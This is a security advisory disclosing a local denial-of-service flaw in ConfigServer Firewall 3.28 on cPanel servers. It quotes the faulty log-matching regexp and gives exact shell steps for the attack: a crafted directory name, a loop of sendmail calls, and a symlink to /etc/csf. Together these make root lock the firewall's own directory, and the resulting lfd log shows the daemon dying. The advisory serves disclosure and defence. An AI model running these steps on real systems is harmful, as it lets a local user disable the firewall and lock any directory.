CSF 3.28 - local users can disable CSF



DESCRIPTION


On cPanel servers, ConfigServer Firewall 3.28 provides the option to send an alert if a script sends more than a specified amount of email from the same directory within an hour. Steps for how to configure this option are detailed in the readme.txt file.

If a script is found to have met the threshold for the maximum emails sent, this option will disable the directory from which the script runs. This is done as root, by changing the permissions on the directory to 0000, and then using the `chattr +i` command on the directory.

The regexp for this can be found in csf/regexp.pm and looked similar to the following:

 236  if ( $log_line =~ /.* cwd=(.*$cpanel_conf{HOMEMATCH}.*) \d+ args:/ ) {
 237      return ($1);
 238  }

Note that the value of $cpanel_conf{HOMEMATCH} will be set to "home" (without the quotes), which is taken from /etc/wwwacct.conf.


The following steps can be used to take advantage of this issue:

[user@host ~]$ mkdir '/tmp/cwd=home 1 args:'
[user@host ~]$ cd '/tmp/cwd=home 1 args'
[user@host /tmp/cwd=home 1 args]$ for x in `seq 1 100` ; do /usr/sbin/sendmail 2>/dev/null ; done
[user@host /tmp/cwd=home 1 args]$ cd ..
[user@host /tmp]$ rmdir '/tmp/cwd=home 1 args:'
[user@host /tmp]$ ln -s /etc/csf '/tmp/cwd=home 1 args:'


This will leave the following in /var/log/lfd.log:

Sun Apr 27 11:29:43 2008 lfd: *Script Alert* - A script in /tmp/cwd=home 1 args: has sent an email 101 times within the last hour
Sun Apr 27 11:29:43 2008 lfd: /tmp/cwd=home 1 args: has been disabled
Sun Apr 27 11:32:54 2008 lfd: *System Exploit* has detected a possible "Random JS Toolkit" - Failed to create test directory /etc/csf/1: Permission denied
Sun Apr 27 11:32:54 2008 lfd: Error: Can't open out file: Permission denied, at line 2946
Sun Apr 27 11:32:54 2008 lfd: daemon stopped
Sun Apr 27 11:32:55 2008 lfd: Error: PID mismatch - died


Notice from the log that lfd died as a result. Also observe the permissions on the /etc/csf directory:

[user@host ~]$ ls -ld /etc/csf
d---------   5 root   root     1024 Apr 27 11:28 /etc/csf



IMPACT


Local users can deny access to any file or directory of their choice.